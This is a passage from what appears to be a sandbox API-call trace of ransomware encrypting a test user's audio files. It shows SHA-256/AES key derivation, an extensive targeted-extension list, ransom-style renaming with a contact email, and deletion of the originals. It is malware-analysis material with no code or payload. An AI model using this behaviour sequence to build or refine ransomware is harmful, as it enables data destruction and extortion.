l.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0193.108] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0193.108] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0193.108] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0193.115] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xd582, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0xd582, lpOverlapped=0x0) returned 1
	[0193.119] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.119] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb2a8) returned 1
	[0193.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.122] CryptCreateHash (in: hProv=0xfcb2a8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0193.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.122] CryptHashData (hHash=0xfb9370, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0193.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.123] CryptDeriveKey (in: hProv=0xfcb2a8, Algid=0x6610, hBaseData=0xfb9370, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9530) returned 1
	[0193.123] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.123] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0xd582, dwBufLen=0xd582 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0xd590) returned 1
	[0193.125] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0193.125] RtlMoveMemory (in: Destination=0xfea710, Source=0xfdd180, Length=0xd582 | out: Destination=0xfea710) 
	[0193.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.125] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfea710*, pdwDataLen=0x18a1ec*=0xd582, dwBufLen=0xd590 | out: pbData=0xfea710*, pdwDataLen=0x18a1ec*=0xd590) returned 1
	[0193.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.149] CryptDestroyKey (hKey=0xfb9530) returned 1
	[0193.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.149] CryptDestroyHash (hHash=0xfb9370) returned 1
	[0193.150] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.150] CryptReleaseContext (hProv=0xfcb2a8, dwFlags=0x0) returned 1
	[0193.150] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0193.150] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0193.151] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.151] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0193.152] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 129
	[0193.152] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0193.153] WriteFile (in: hFile=0x390, lpBuffer=0xfea710*, nNumberOfBytesToWrite=0xd590, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfea710*, lpNumberOfBytesWritten=0x18a648*=0xd590, lpOverlapped=0x0) returned 1
	[0193.160] CloseHandle (hObject=0x390) returned 1
	[0193.160] CloseHandle (hObject=0x388) returned 1
	[0193.160] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav")) returned 1
	[0193.169] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav")) returned 0
	[0193.170] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f6fb30, ftCreationTime.dwHighDateTime=0x1d9707b, ftLastAccessTime.dwLowDateTime=0x61000170, ftLastAccessTime.dwHighDateTime=0x1d97082, ftLastWriteTime.dwLowDateTime=0x61000170, ftLastWriteTime.dwHighDateTime=0x1d97082, nFileSizeHigh=0x0, nFileSizeLow=0xe3dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="iDC41.wav", cAlternateFileName="")) returned 1
	[0193.170] lstrcmpW (lpString1="iDC41.wav", lpString2="..") returned 1
	[0193.170] lstrcmpW (lpString1="iDC41.wav", lpString2=".") returned 1
	[0193.170] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\"
	[0193.170] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\", lpString2="iDC41.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\iDC41.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\iDC41.wav"
	[0193.170] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\iDC41.wav") returned 73
	[0193.170] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0193.171] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\iDC41.wav", cchLength=0x49 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav") returned 0x49
	[0193.171] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0193.171] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav", lpSrch="help_decrypt_your_files") returned 0x0
	[0193.171] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav"
	[0193.171] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav") returned 73
	[0193.171] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0193.172] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0193.172] StrStrW (lpFirst=".wav", lpSrch=".") returned=".wav"
	[0193.172] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0193.172] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".wav") returned=".wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0193.173] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0193.173] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0193.173] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\idc41.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0193.180] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xe3dc, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0xe3dc, lpOverlapped=0x0) returned 1
	[0193.183] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.184] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb7f8) returned 1
	[0193.186] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.186] CryptCreateHash (in: hProv=0xfcb7f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0193.186] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.187] CryptHashData (hHash=0xfb92f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0193.187] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.187] CryptDeriveKey (in: hProv=0xfcb7f8, Algid=0x6610, hBaseData=0xfb92f0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9470) returned 1
	[0193.187] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0193.187] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0xe3dc, dwBufLen=0xe3dc | out: pbData=0x0*, pdwDataLen=0x18a20c*=0xe3e0) returned 1
	[0193.189] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
